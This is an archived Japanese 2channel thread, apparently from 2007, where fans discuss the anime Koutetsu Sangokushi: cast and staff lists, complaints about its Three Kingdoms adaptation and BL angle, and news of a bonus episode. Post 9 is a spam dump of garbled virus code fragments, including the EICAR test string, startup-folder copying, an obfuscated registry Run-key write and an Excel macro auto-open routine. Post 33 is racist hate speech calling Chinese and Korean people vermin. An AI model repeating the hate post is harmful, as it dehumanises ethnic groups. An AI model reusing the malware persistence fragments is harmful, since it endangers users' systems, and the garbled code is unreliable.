2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

鋼鉄三国志 第七章

1 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:10:00 ID:bIBT1cDp
=======================重要=======================
 【※実況厳禁】スレあぼーん+懲罰サーバ(スレ運営が困難)送り。
 基本的にsage進行(メール欄に半角でsage)で。2chブラウザ推奨。
 荒し、煽りは徹底的に放置。
 次スレは>970が立てること。立てられない時は代わりを指名。
==================================================
AT-X  毎週(水)10:30/21:30
     毎週(土)15:30/26:30

今から時をさかのぼること、千八百余年。
我々が知る実際の中国史とは別の、もうひとつの幻想古代中国。
それはあまたの英雄が覇権を争う戦乱の世界であった。
激しき歴史の波の中で、己の信ずるもののために戦った若者の
気高く、美しきドラマ…… それが「鋼鉄三国志」である!!
※「三国志」をモチーフに異世界を舞台にした作品です

【公式サイト】
鋼鉄三国志 ttp://www.koutetsu-sangokushi.jp/file/jsp/index.html
テレ東公式 ttp://www.tv-tokyo.co.jp/anime/koutetsu-sangokushi/

【前スレ】
鋼鉄三国志 第六章
http://ex21.2ch.net/test/read.cgi/anime/1187377465/

2 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:12:19 ID:bIBT1cDp
【声の出演1】

・陸遜伯言:宮野真守
戦乱の世を嘆き、己の進むべき道を探す、ひたむきでまっすぐな若者。
孔明の命により呉の国に仕官し、エース部隊「六駿」の一人に選ばれる。
・諸葛亮孔明:子安武人
類いまれなる知性と妖しいまでの美しさをあわせ持つ天才軍師。
在野の士として、愛弟子・陸遜と旅を続けていたが、陸遜が呉に旅立ったのち、
「三顧の礼」に応えて劉備玄徳に仕えることになる。
・凌統公績:斎賀みつき
陸遜を兄貴と慕う無邪気で天真爛漫な少年。呉の大将軍凌操の一人息子。
父の強さに憧れつつも、自分を一人前と認めてくれない父に対して複雑な感情を持つ。
のちに陸遜と同じ「六駿」の一人に選ばれる。
・諸葛瑾子瑜:遊佐浩二
飄々として捉えどころのない雲のような男であるが、その内面は偉大なる実弟・
孔明に対するコンプレックスと愛情の間で揺れ動いている。「六駿」の一人。
・呂蒙子明:石田彰
まじめで気弱だが、面倒見がよく「六駿」唯一の常識人。
呉に仕えたばかりの頃は「へなちょこ」と呼ばれるほどであるが太史慈の強さに憧れ、
徐々に武将としての資質に目覚めていく。
・太史慈子義:伊藤健太郎
普段は豪放磊落で竹を割ったような性格であり、戦闘では鬼神のごとき強さを発揮する
呉の国最強の戦士。陸遜たちの兄貴分であり、「六駿」のリーダー的存在。
・甘寧興覇:諏訪部順一
勇猛さに加え、冷徹さをあわせ持つクールな武将。
当初は呉と敵対する黄祖に仕えるが、後に呉に身を投じ「六駿」の一人となる。
弓を得意とし「鈴の甘寧」と呼ばれる。

3 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:12:46 ID:bIBT1cDp
【声の出演2】

・孫権仲謀:生天目仁美
兄孫策の跡を継ぎ呉の国の君主になる少年。
純粋なまでの優しさゆえ戦いを憂い、時として主君としての立場を見失いかけるが、
陸遜らに支えられ、次第に自己を確立させていく。
・孫策伯符:松本保典
孫権の兄。呉の国の先代君主。
力に魅入られ、陸遜の父を殺し陸家から玉璽を奪い取る。

・周瑜公瑾:三木眞一郎
・凌操公訣:井上和彦
・魯粛子敬:野島健児
・張昭子布:宮澤正
・劉備玄徳:佐藤利奈
・関羽雲長:大川透
・張飛益徳:小野坂昌也
・趙雲子龍:杉山紀彰
・黄祖元陽:置鮎龍太郎
・張遼文遠:山口勝平
・曹操孟徳:三ツ矢雄二

4 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:13:02 ID:bIBT1cDp
【製作陣】
総監督:えんどうてつや
監督:嵯峨敏
美術監督:森元茂
音響監督:平光琢也
美術コンセプトワーク:大野安之
音楽:鳥山雄司
色彩設計:児玉尚子
音響制作協力:神南スタジオ
シリーズ構成:高橋ナツコ
アフレコ監督:三ツ矢雄二
キャラクターコンセプト:三条、朱鷺
制作:NAS
キャラクターデザイン・総作画監督:橋本浩一、塚本知代美、岡野幸男
シナリオ:高橋ナツコ ・山下憲一・平見 瞠・猪爪慎一・渡邉大輔

【OP曲】
「Nostalgia」
作詞:HAYATO、TAKA
作曲:KIKU
歌:camino
ttp://www.camino-project.com/top.html

【ED曲】
「久遠」
作詞・作曲・編曲:Alchemyt
歌:宮野真守(陸遜伯言役)

5 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:13:19 ID:bIBT1cDp
【「鋼鉄三国志」の鍵を握る3つのキーワード】
・炎烈鎧(えんれつがい)
この世界の武将が持つ特殊な武具。
剣、槍、弓など、武将ごとにさまざまな種類のものが存在するが、すべて宝玉が
備わっており、身につけると強大な力を発揮することが出来る。
・玉璽(ぎょくじ)
古(いにしえ)より伝わる究極のエネルギー体。
炎烈鎧を持つ者の中で、玉璽の意思に選ばれしものが触れると自己の内なる力が
呼び覚まされ、「煌星」と呼ばれる覚醒状態に至ることが出来る。
代々陸家が密かに守ってきた古代文明の宝である。
・煌星(おうせい)
炎烈鎧を持つ武将が玉璽の力により覚醒した状態。
炎烈鎧が体を覆うアーマー状態となり、究極の力を発揮することが出来る。

6 :名無しさん@お腹いっぱい。:2007/10/13(土) 22:14:37 ID:bIBT1cDp
【関連スレ】 ※腐れ話題は該当スレで!
[同人板]
鋼鉄三/国/志@同人
http://anime2.2ch.net/test/read.cgi/doujin/1182601094/
[801板]
【女性向】鋼鉄三国志801スレ 3玉璽【パラレル】
http://sakura03.bbspink.com/test/read.cgi/801/1186060862/l50
[アニキャラ個別板]
【鋼鉄三国志】孫権仲謀と凌統公績に萌えるスレ 2章
http://anime2.2ch.net/test/read.cgi/anichara2/1187543663/l50

【ラジオ】
「宮野・遊佐の鋼鉄三国志〜らじお伝〜」
文化放送 土曜日26:30〜26:45(午前2時30分から2時45分)

7 :名無しさん@お腹いっぱい。:2007/10/13(土) 23:05:00 ID:OlE56cTp
>>1
思えば、アンチスレを立てるアニメを探していた俺が
放送日前日に本スレすら立ってないアニメを見つけて
慣れない本スレのテンプレを一から作って立てたのが
「鋼鉄三国志」だったんだよな…(しみじみ)
 
※鋼鉄三国志のアンチスレは誰かが糞つまらんタイトルで立てた
※今はアンチスレしか立てていないw

8 :名無しさん@お腹いっぱい。:2007/10/13(土) 23:29:19 ID:7MX9Sbeu
>>1
乙!

>>7
そうだったんだwおまいも乙


9 :名無しさん@お腹いっぱい。:2007/10/13(土) 23:42:21 ID:JLUWAmm3
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


10 :名無しさん@お腹いっぱい。:2007/10/14(日) 00:56:07 ID:gi8kn7Hv
>>1


なんだかんだ言って見てたけど最後まで笑えた

11 :名無しさん@お腹いっぱい。:2007/10/14(日) 01:22:02 ID:D4oQXumP
>>1乙!!
>>7も乙w

なんだかんだ言っても、毎度笑わせてくれて好きだったよ
CD買うくらいにはw出来が良いんだもの…

12 :名無しさん@お腹いっぱい。:2007/10/14(日) 01:52:04 ID:JJb/oKuQ
>>1>>7
乙!

アニメ終わったらもっと人いなくなると思ってたんだがそうでもなかったな
懲りずに家ゲ希望と叫ぶ

13 :名無しさん@お腹いっぱい。:2007/10/14(日) 02:36:05 ID:ffC0VhFZ
>>1
乙。

しかし、IGPXより語ることが無い。
アレはまだエイミーやリズやファンティーヌやサトミやロケットジョージや
マックスやジョディーやヤマーさんでまだネタ潰しできたのにな。

14 :名無しさん@お腹いっぱい。:2007/10/14(日) 03:32:36 ID:r2bcBhFi
>>1

そういや孔明が玉璽の力封じるとか言ったのに、その後も劉備とお陸は
何事も無かったように煌星まとってたのは何だったんだろう…

15 :名無しさん@お腹いっぱい。:2007/10/14(日) 08:21:46 ID:cKYlZj5b
リウビは使ってた宝玉が関張のなので
擬似玉璽パワーが残留してたかなーとか。

お肉は主役補正かコメのえこひいきw

16 :名無しさん@お腹いっぱい。:2007/10/14(日) 11:20:44 ID:2i3KV6sh
果たして三国志って腐女子に人気があるジャンルだったんだろうか
魏や蜀でなく呉陣営ってのもマイナー感が漂うし

17 :名無しさん@お腹いっぱい。:2007/10/14(日) 11:54:04 ID:sJ7HJzN4
一昔前、孔明は沖田と並んで歴史801のカリスマとまで言われてたらしいがな?〈by肥の某雑誌
女子でも遊べるアクション系歴史ゲーが流行り出してからは、
固定がなくなって分散化したらしい。
バサラ人気もあるし需要はあると思う。
ただし名前だけ借りた中身オリジナルは、よっぽど出来た作品じゃないと、
比べられるためのネタ的需要はあれど、
真ファンはつきにくいと思う。


18 :名無しさん@お腹いっぱい。:2007/10/14(日) 16:10:59 ID:Ufwf53v0
>13 何でIGPXを引き合いに出すんだよw

>16 失礼ながら、女性で歴史が好きな人はメカニックが好きだって人と同じくらい
少ないような印象がありますな。 でも魏に較べれば呉は人気あったし、
今は単一の勢力とか人物ではなく満遍なく好きって人が多い(らしい)ですよ?

19 :名無しさん@お腹いっぱい。:2007/10/14(日) 17:41:33 ID:HU8AE+aC
せっかくコナミなのにゲーム化しないんだな
煌星してのアクションでも
本編補完のアドベンチャーでもいいから
出して欲しいものだ


20 :名無しさん@お腹いっぱい。:2007/10/14(日) 19:08:31 ID:KuE3QBl5
そこでなぜかカードゲームに

21 :名無しさん@お腹いっぱい。:2007/10/14(日) 21:23:51 ID:HU8AE+aC
そういえばトレカの第二弾告知が未だに来ないな

22 :名無しさん@お腹いっぱい。:2007/10/15(月) 20:44:19 ID:kwrlyaNz
トレカちゃんと第三弾まで出るんだろうか
疑わしくなってきた

23 :名無しさん@お腹いっぱい。:2007/10/15(月) 21:34:31 ID:fCS0FvIG
え?まだ3弾まで出ると信じてらっしゃるのかwwこういうのって、大抵出るって言って、壱弾で終わるクチじゃww

24 :名無しさん@お腹いっぱい。:2007/10/15(月) 22:07:21 ID:+A8wbaTQ
>>20
ずっと俺のターンとか言いたいよな

25 :名無しさん@お腹いっぱい。:2007/10/15(月) 23:15:14 ID:eFKfK37P
三国志ファンと腐女子をターゲットにしながらも
どちらにも相手にされなかった不遇な作品

26 :名無しさん@お腹いっぱい。:2007/10/16(火) 00:39:26 ID:bCpQS169
三国志ファンにとっちゃオリジナル色強すぎで、
メインの師弟関係もありえなかったし、
一般にもゴクシファンにもストーリ意味不明だったしw

27 :名無しさん@お腹いっぱい。:2007/10/16(火) 00:42:28 ID:YWnzgIWF
そりゃまあなあ…とにかく企画が安易すぎる
三国志二次創作モノとしてはとてもじゃないが…
たぶん一番食いつきがいいのは中の人ファンだろうなあ

28 :名無しさん@お腹いっぱい。:2007/10/16(火) 05:43:41 ID:uiUDJMan
まぁ前半はネタアニメとして楽しめる作品だったからな
そのノリで最後まで進んでほしかったとも思う

29 :名無しさん@お腹いっぱい。:2007/10/16(火) 09:07:41 ID:kTgvCDzX
「今度やる鋼鉄ってアニメは
孫策と周瑜の仲をもっと掘り下げたものなんだって」なら
「うわ、みてぇ」と、3594腐女子も飛びつくかも知れないが、
「今度やる鋼鉄ってアニメは
諸葛亮と陸遜の関係もっと掘り下げたものなんだって」だと
「なんで諸葛亮と陸遜なの?掘り下げるも何も関係あんまりないわけだし」
と、まずはそういう反応だろう。普通に考えて。
だから三国志ファンを狙ってはいないと思う。
これがもし三国志ファンも視野に入れて作られた企画なら企画者はド素人。

30 :名無しさん@お腹いっぱい。:2007/10/16(火) 09:59:34 ID:20wCSHSg
でも単体萌えっていうのも結構いる。
その名を持つキャラが、名の元となった者の原型を留めてなくても、
嗜好に合ってさえいれば良い腐は結構いると思うよ。
そういう人向きかも知れないね。

腐は関係なく自分の鋼鉄感想だけど、
三国志が10だとして、鋼鉄はそこから無理に9引いて、まったく違う10を作っていこうとしたアニメだった。
でも別の10を作るにしても、1の次が突然5になったりまた1に戻ったり、
別のものと見せつつ元の10にちゃっかり頼ってたり、土台が不安定だった。
三国志が好きな人にとっては10から引き算で新しいものを見せられるよりは、
土台が安定した元の10から、いろいろとプラスしていってくれたほうが安心できるな。
引き算はよっぽど良いものじゃなくちゃ、ちょっとねー
でもネタ的意味で中盤に入る前までは面白かったよ。それなりに。

長文ごめん。


31 :名無しさん@お腹いっぱい。:2007/10/16(火) 14:48:34 ID:EE8Zx9MU
別に三国志なんて全然意識しないで
全く新しいドラマとして見てたよ。
みんなずいぶん難しく考えるんだね。

32 :名無しさん@お腹いっぱい。:2007/10/16(火) 16:46:11 ID:eaH3dyjL
だってアニメ本編よりも、スレッドで考察してる方が面白いんだもの。

33 :名無しさん@お腹いっぱい。:2007/10/16(火) 22:13:29 ID:vGtEsQdh

○日本国内の中国人・韓国人が「1000万人」に○
福田康夫自民党は「日本国内の中国人・韓国人を100万人へ」を目指し奔走している。

繁殖だけが取り柄で凶悪犯罪がお家芸である中国人・韓国人という害虫が卵を残し
「100万人」から近い将来「1000万人」、そして「一億人」になるのは明らかに目に見えて時間の問題である。

34 :名無しさん@お腹いっぱい。:2007/10/16(火) 23:24:17 ID:7lYNQqx+
それだけ突っ込みどころが多すぎた作品だからな
有名な原作を持ってきてこの改変だもの

35 :名無しさん@お腹いっぱい。:2007/10/17(水) 03:19:24 ID:lSDHSq57
自分も>>31と同じように見てたなぁ
好きな武将が(゚д゚)なことになってたけど別の人物にしか見えなかったから特に痛くもなかったし
まー半年もあったせいか愛着が湧いてしまったというかね

36 :名無しさん@お腹いっぱい。:2007/10/17(水) 09:50:29 ID:Pbb8h+eD
自分は面白がってたけど、
心のどこかでナメるなよってのは常にあったなw
そもそも鋼鉄との初出会いが三マガだったな。
三マガって変なマンが結構のってるけど、
根底に流れるものは三国志ファンの雑誌だったからさ、
鋼鉄はそこから浮いてる気がした。
作り手から愛が感じられないって言うか。
あくまで主観だけど。
そう思うと無性に腹が立つと言うかさ。
まあ、むしろ面白がってみてたけど、
でも振り返ってみるとあれはないよと思う場面の方が多かった。
三国志冠にしてるのに作り手は三国志分かってないと思ってた。

37 :名無しさん@お腹いっぱい。:2007/10/17(水) 19:40:26 ID:2b0eZ/iC
鋼鉄三国志って何が鋼鉄だったの?

38 :名無しさん@お腹いっぱい。:2007/10/17(水) 19:41:55 ID:NYkRIHZi
多分あの炎烈鎧

39 :名無しさん@お腹いっぱい。:2007/10/18(木) 16:11:40 ID:4FBkrr1A
らじおで、初回(文字通り第一回な)以来
漫画版も三国志マガジンも全く話題にしてないのが不誠実すぎてむかつく

40 :名無しさん@お腹いっぱい。:2007/10/18(木) 20:54:18 ID:k/WGv4LX
話題にするようなことあるか?>三マガ
まぁラジオ聞いたことないが

昨日寝呆けて「やべー鋼鉄始まる時間じゃん」とテレビつけた自分は相当侵されてるなと思った

41 :名無しさん@お腹いっぱい。:2007/10/18(木) 23:57:16 ID:GNyTev8r
DVDの売り上げの責任を取らされてコナミのプロデューサーも更迭三国志

42 :名無しさん@お腹いっぱい。:2007/10/19(金) 00:29:43 ID:8aRHcnke
真似したわけじゃないんだろうけど三国無双5の司馬懿の武器が諸葛謹と同じで吹いたw

43 :名無しさん@お腹いっぱい。:2007/10/19(金) 19:20:04 ID:k9HCH/uI
ttp://www.uploda.org/uporg1072210.jpg.html

44 :名無しさん@お腹いっぱい。:2007/10/19(金) 20:24:55 ID:8kq0ZZt4
今更だけど趙雲ってあのマスクで呼吸できんの?

45 :名無しさん@お腹いっぱい。:2007/10/19(金) 20:56:10 ID:aUTy5fUj
えら呼吸でもしてんじゃね?

46 :名無しさん@お腹いっぱい。:2007/10/20(土) 08:58:47 ID:swD4l/fQ
そらSWEETの魯粛だ

47 :名無しさん@お腹いっぱい。:2007/10/20(土) 19:05:39 ID:3w5e7IBX
何で劉備を池沼のガキにしたのかが解せん

48 :名無しさん@お腹いっぱい。:2007/10/21(日) 01:25:57 ID:zd6JrwlP
それを言ったら他キャラだって…

>>42
無双乱舞が想像できんw

49 :名無しさん@お腹いっぱい。:2007/10/21(日) 04:55:59 ID:eW5byIFp
>>48
無双乱舞は鋼鉄で言う煌星かもよwwwwww
どちらにせよ笑えるwww

50 :名無しさん@お腹いっぱい。:2007/10/22(月) 09:43:57 ID:Ie0V1xev
声優にとっては、とっとと忘れて次の仕事にいきたいアニメだったろうが
コナミは骨までしゃぶって赤字を埋めるためにラジオは続行させられてるのな。
と思っていたら、「この面子で集まってまた何かやりたいね」なんておためごかし
言ってて驚いた。あんな扱いでも満足なのかロバ兄よ。
そういや一騎当千もラジオ続いてるが、あれはゲームも出るし月一だからな

51 :名無しさん@お腹いっぱい。:2007/10/22(月) 09:54:28 ID:bbl5letP
ほうほう

52 :名無しさん@お腹いっぱい。:2007/10/22(月) 10:56:08 ID:NOQhmSHB
>>50
マジか
期待するじゃないか

53 :名無しさん@お腹いっぱい。:2007/10/22(月) 12:05:50 ID:McCyqRRh
一騎当千は面白かった

DVDも売れてるw

54 :名無しさん@お腹いっぱい。:2007/10/22(月) 12:17:28 ID:XVUaCrHd
一騎トウセンは本来の人物の立ち位置は変えてないから、
そういう意味では見易かったなぁ。
好きではないけどね。
鋼鉄も勢力図や立ち位置的なものを変えないで、パラレル三国志だったら、
まだマシだったような気がするな。
とは言っても、立ち位置があからさまに違ったのは、あの師弟関係くらいだけど、
でもそれが根本的に頂けなかったんだよ。

55 :名無しさん@お腹いっぱい。:2007/10/25(木) 00:18:03 ID:bFx9Ln6u
陸遜で女性向なら相手は呂蒙か甘寧と相場が決まってるw
三国志腐女子を取り込めなかったのは市場調査不足が原因かと。

56 :名無しさん@お腹いっぱい。:2007/10/25(木) 00:49:56 ID:Ohjy7hK5
武将髭分が絶望的に足りてない

57 :名無しさん@お腹いっぱい。:2007/10/25(木) 07:54:18 ID:9KUEDi3/
>>55
あと凌統や孫権もそこそこよくあるんだぜ!

まぁ諸葛亮というのは皆無なわけですが

58 :名無しさん@お腹いっぱい。:2007/10/26(金) 04:38:54 ID:+84EXxM4
というか腐女子狙いすぎると腐女子は狙えないという

DVD4巻見た
コメンタリーの石田ツッコミ激しいなwww

59 :名無しさん@お腹いっぱい。:2007/10/26(金) 10:04:49 ID:os9zO6Az
資料集とどいた
一番腰を抜かしたのは26話製作中の文字
凌統メインの後日談らしい

60 :名無しさん@お腹いっぱい。:2007/10/26(金) 10:26:25 ID:9TeEf8cY
>>59
なにそれ?特番予定があるってこと?
それだと嬉しいんだが。
本編は本当に1から最後まで納得できなかった。
陸遜が世界を救ったオチに一見見せておいて、
実は単なる我侭を通しただけだからさ、
26と言わず、1話から練り直してリメイクやってもらいたいくらいだよ。
それか普通に基本の三国志で、陸遜を中心に展開させて容姿は鋼鉄キャラとか。
そっちの方が絶対に人気でてたと思うんだよな。

61 :名無しさん@お腹いっぱい。:2007/10/26(金) 10:33:28 ID:os9zO6Az
特番ではなく、DVD最終巻に収録されるらしい
この間来たアンケートも多分これの先行上映会を
するかどうか、って意味じゃないかな
最終回の三年後で成長した凌統の姿が見られるらしいが
「姜維」の文字が…義弟にしてくれって…

62 :名無しさん@お腹いっぱい。:2007/10/26(金) 11:00:08 ID:Hg+v8RIH
げぇっ、姜維でてくんの?
もうこれ以上、三国武将の名前を使って気の毒な演出はやめてほしいよ。
鋼鉄、なんだかんだ言って最後までしっかり見たし、好きなシーンは幾つかあるんだけどねぇorz

63 :名無しさん@お腹いっぱい。:2007/10/26(金) 11:27:48 ID:m8204OVI
>>59,61
なんだそれwww
DVD売れてないし視聴率も壊滅だったのに
後日談作れるお金あったのかw
凌統好きだから最終巻だけ買うかな
でも成長した凌統って…
あの格好じゃなくなってたらどうしよう

64 :名無しさん@お腹いっぱい。:2007/10/26(金) 12:37:32 ID:OBMi+4s6
>>59-61
マジでか!!
凌統好きの自分としてはかなり嬉しい
ニーソじゃなかったら泣くけど

65 :名無しさん@お腹いっぱい。:2007/10/26(金) 13:54:21 ID:rPoVteI8
陸抗や諸葛恪じゃないあたりがまた舐めてますな。

66 :名無しさん@お腹いっぱい。:2007/10/26(金) 13:55:30 ID:mvARpayR
ニーソはないんじゃないかな
もう大人だろう
父上の衣装だったりして

67 :名無しさん@お腹いっぱい。:2007/10/26(金) 15:41:52 ID:os9zO6Az
本スレであがってたんだけど
26話がDVDに追加されて
凌統と姜維が出てくるみたい
設定集買ってくる!

68 :名無しさん@お腹いっぱい。:2007/10/26(金) 16:03:30 ID:SXpoDj+x
>>66
父上衣装の綾統はいろんな意味で萌えるぞwww

69 :名無しさん@お腹いっぱい。:2007/10/26(金) 16:30:10 ID:8T6Ckrzq
( ゚∀゚)o彡゜おっぱい!おっぱい!

70 :名無しさん@お腹いっぱい。:2007/10/26(金) 20:19:09 ID:LK4l4Axu
資料集買った。
26話あらすじ見る限り魏は何気に生き残ったんだな

71 :名無しさん@お腹いっぱい。:2007/10/26(金) 20:56:30 ID:G9lfWWVN
26話のあらすじkwsk

72 :名無しさん@お腹いっぱい。:2007/10/26(金) 22:14:56 ID:LK4l4Axu
>>71
あらすじ:
五丈原から三年後、和解のために魏を訪れた孫権とその護衛の凌統。
凌統が街中で助けた少年・姜維に義兄弟になってくれと頼まれる

73 :名無しさん@お腹いっぱい。:2007/10/27(土) 00:21:40 ID:v4TzTOuA
今更ながら撮り貯めしてたの一気観した
ラスト二話のテンションの高さに感動

74 :名無しさん@お腹いっぱい。:2007/10/27(土) 00:42:13 ID:lSbhjNQv
>>72
曹操出るのかww
楽しみになってきた

75 :名無しさん@お腹いっぱい。:2007/10/27(土) 00:45:01 ID:QvsNc44W
>>73
ストーリーに感動ではないの?

つうか、26話嬉しいけど、もう新キャラいらん・・・・
姜維だしまた変態和菓子の誘惑オチだったら最低だよ。
最終回でマトモになって、ちょっと和菓子が好きになれそうだったのにな。
変態に戻ってないことを祈る。


76 :名無しさん@お腹いっぱい。:2007/10/27(土) 00:51:33 ID:QvsNc44W
というか、姜維は陸遜にそっくりという設定だったりしてね。
三国無双なら師弟関係といえば孔明と陸遜が有名だし(三国志だと厳密的には違うけど)
陸遜に瓜二つの姜維を凌統が孔明に引き合わせて、
孔明は落ち込んで隠棲してたんだけど、姜維を弟子にして平和を・・・・
という安易なストーリーが脳裏にw


77 :名無しさん@お腹いっぱい。:2007/10/27(土) 01:00:32 ID:pjMF3yz+
>父上衣装の綾統はいろんな意味で萌えるぞwww

ttp://blwh.up.seesaa.net/image/359_04-02.jpg

78 :名無しさん@お腹いっぱい。:2007/10/27(土) 09:24:51 ID:lSbhjNQv
設定集と一緒に出た小説読んだ人いる?
前に出た奴と比べてどんなもんなんだろ

79 :名無しさん@お腹いっぱい。:2007/10/27(土) 10:54:30 ID:OYFKDhNW
小説二冊目
前に比べてものっそい格調下がってる。
なんか安い。

80 :名無しさん@お腹いっぱい。:2007/10/27(土) 11:44:02 ID:q/kiSK7S
執筆者を検索したら著作もまともにでてこない
素人ライターの寄せ集めで吹いたから買ってない
漫画のアンソロジーならまだ素人でもいいんだが文章は辛い
前作の人に何故異説二の巻で頼まなかったのか


81 :名無しさん@お腹いっぱい。:2007/10/27(土) 15:33:59 ID:HJCovY3x
DVD5巻のパッケージが断金で嬉しい。

82 :名無しさん@お腹いっぱい。:2007/10/27(土) 18:12:38 ID:sh9MNptG
新撰組でBLを描いた作品は結構あるけど三国志でBLって鋼鉄以外あったっけ?

83 :名無しさん@お腹いっぱい。:2007/10/27(土) 18:31:24 ID:0Lxe4A1A
あからさまに腐女子向けで限りなくBLに近いけど、一応BLじゃないんだぜ

84 :名無しさん@お腹いっぱい。:2007/10/27(土) 21:51:41 ID:q/kiSK7S
しかしネタとしてもBL風味を楽しめない人は
確実にOPで切り落としている極悪非道なアニメだったな…

85 :名無しさん@お腹いっぱい。:2007/10/28(日) 00:18:38 ID:zrnTc5QN
普通に楽しめた。つかOPをそんな目で見た事は無かったな

86 :名無しさん@お腹いっぱい。:2007/10/28(日) 00:47:51 ID:EOOeHg+H
新撰組BLは元の新撰組から思いつく組み合わせが多いんで安心して楽しめる。
三国志BLも新撰組と同様昔からカップリングが確立されてる感じだから、
そこに新しいカプを持ってくる鋼鉄は、無謀と言うかすげいチャレンジャーだと思った。
でも周瑜と甘寧、呂蒙と太史慈は、今まで聴いたこともないカプだったけどすんなり受け止めれたよ。
メインの二人だけは、うーん・・・・自分は最後までついていけなかった。今でも無理。



87 :名無しさん@お腹いっぱい。:2007/10/28(日) 00:48:03 ID:G9Eq8No2
普通とは言えんだろ普通とはww
まるで時代劇のお色気シーンのような孔明の水浴び描写とか
カマおじゃるとかピンクアフロとか
たまたまチラ見した人間でもなんか変なアニメだなくらいは思うだろw


88 :名無しさん@お腹いっぱい。:2007/10/28(日) 00:59:11 ID:WL1EE70o
そっちの二組はまだ尊敬するようになる様とかあるから
いいんだが肝心の主役の描写が酷すぎた
設定集も読んだけど脚本作りに一年もかかって長すぎたから
きっとスタッフも肝心の二人の親密さが表現されてないことを
忘れていたんだな
「あれ?とっくに描いてなかったっけ?」といった感じで

89 :名無しさん@お腹いっぱい。:2007/10/28(日) 01:31:37 ID:w/rtHoS2
仮に本編でしっかり書かれていたとしても、三国志元から好きな香具師は納得しないほうが大半なんじゃないかな?w
いや好きじゃない香具師でも思考回路自体がイミフだったし。


90 :名無しさん@お腹いっぱい。:2007/10/28(日) 02:47:21 ID:DMwes6/D
今更だがあのラストは酷いよ
終始孔明の呪縛から逃れられなかった

91 :名無しさん@お腹いっぱい。:2007/10/28(日) 23:51:20 ID:6t+dCoAR
まぁみんな設定集読めよ
キャストのツッコミ激しいぞ

92 :名無しさん@お腹いっぱい。:2007/10/29(月) 00:02:46 ID:NFeeFSUP
微妙に気になるけど1500円出すのは躊躇われて見かけたけど買わずに帰ってきた
どんなこと書いてあった?

93 :名無しさん@お腹いっぱい。:2007/10/29(月) 20:16:39 ID:2xF6JF3O
陸遜のダメさ加減とか説明不足なとことか普通に書いてあってウケたよ
変にいいこと言おうとしてないからインタビュー面白かった
あと初期設定、趙雲あのままで良かったのになw

94 :名無しさん@お腹いっぱい。:2007/10/29(月) 21:43:34 ID:Cxnyr+kK
つか陸孫呉に仕官〜25話までに2年も経っててワロタ
そんなに時間経過してたのかwwwwwwww

95 :名無しさん@お腹いっぱい。:2007/10/29(月) 23:01:33 ID:A3qaY43u
そして新たに姜維と凌統の、
誰もが想像し得なかった801が生まれるわけですよw
てえか、オリジナルなのは設定資料のインタビュー見て分かった。
じゃあはじめから名前つかわんでくれ・・・
三国志を語る交流スレに最近鋼鉄厨が沸いてて非常に困っている。

96 :名無しさん@お腹いっぱい。:2007/10/29(月) 23:14:52 ID:Gc2sMacJ
鋼鉄厨なんているのか
こんな作品でもそこまで好いてくれる人がいるんだな

97 :名無しさん@お腹いっぱい。:2007/10/30(火) 16:56:43 ID:t2T8xGfj
三国志板のスレッドではそういった現状をいくつかうかがい知れたけど、
こっちでも詳しく聞きたいね更迭厨について

98 :名無しさん@お腹いっぱい。:2007/10/30(火) 20:38:19 ID:JnbxQNog
三国志板に鋼鉄の話持ち出すような奴はこのスレにはいないんじゃないか

99 :名無しさん@お腹いっぱい。:2007/10/30(火) 21:09:32 ID:Wz2mLjCf
鋼鉄スレなのに三国志のはなし持ち出す輩は非常に多いけどねw
いや、これは冗談として、自分も鋼鉄の影響受けてるんだろうなーと思った例は見た。
個人サイトさんなんであまり詳しく言えないが、
キリリクで鋼鉄の○×△のCPが好きなんで、あなたのオリジナルでそのCP書いて下さいってのは見たな。
そこ鋼鉄の話題一切してないサイトで一応は呉を扱ってはいるんだが、管理人さんは内心吃驚してたんじゃないかなと思った。

100 :名無しさん@お腹いっぱい。:2007/10/31(水) 03:22:10 ID:FUOQTH25
古参の三国志オタなら無双やらなんやらで耐性ついてるよ大丈夫。
正史なら考えられない、おまwwwwどう見ても顔で選んだだろwwwwなカプに
お嬢さんたちが食いついてちょっと流行ったりするのも慣れっこだ。

しかし、陸遜のキャラ付けという意味では蜀の敵役ということで小物系悪役にされたり、
董卓そっくりのデブにされたりしたことはあれど、
あれだけしょうもないDQNにされた作品は初なのでそこに戸惑ってる私ガイル。

101 :名無しさん@お腹いっぱい。:2007/10/31(水) 10:53:16 ID:WQ+YoBrR
三国志板にあった鋼鉄のスレッドで、みんなツッコミしてたんよ。

んで、呉を中心にやってる人達でも諸葛亮マンセーしてるような事ってあるの?

102 :名無しさん@お腹いっぱい。:2007/11/01(木) 00:12:45 ID:WDq8YSne
陸遜が主役なのはまあいいとしても、陸遜と孔明がやおい師弟な設定には
普通の三国志ファンは吹くだろ

103 :名無しさん@お腹いっぱい。:2007/11/01(木) 00:26:54 ID:Mb30OR/F
実際に吹きましたw
あれだけは本当に最後まで付いていけなかったよ。
というか、師弟とか以前に、思考が理解できんくて困った。マジに。

104 :名無しさん@お腹いっぱい。:2007/11/01(木) 19:56:09 ID:DYE+Qa46
まぁお陸みたいな主人公は後にも先にもいないだろうな
